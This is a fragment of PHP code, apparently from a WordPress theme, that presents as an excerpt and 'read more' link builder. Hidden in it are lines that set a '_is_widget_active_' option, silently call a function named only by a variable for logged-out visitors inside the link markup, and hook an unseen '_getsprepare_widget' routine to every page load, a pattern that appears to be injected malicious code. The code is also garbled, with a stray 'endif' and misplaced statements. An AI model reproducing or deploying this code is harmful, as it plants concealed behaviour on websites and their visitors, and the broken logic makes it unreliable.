		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $com_length) {
				$l=$com_length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_link="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $allowed_tags) {
		$output=strip_tags($output, $allowed_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($f_tags) ? balanceTags($output, true) : $output;
	$output .= ($showdots && $ellipsis) ? "..." : "";
	$output=apply_filters($type_filter, $output);
	switch($aditional_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_more ) {
		if($fmore) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_getsprepare_widget");

	
?>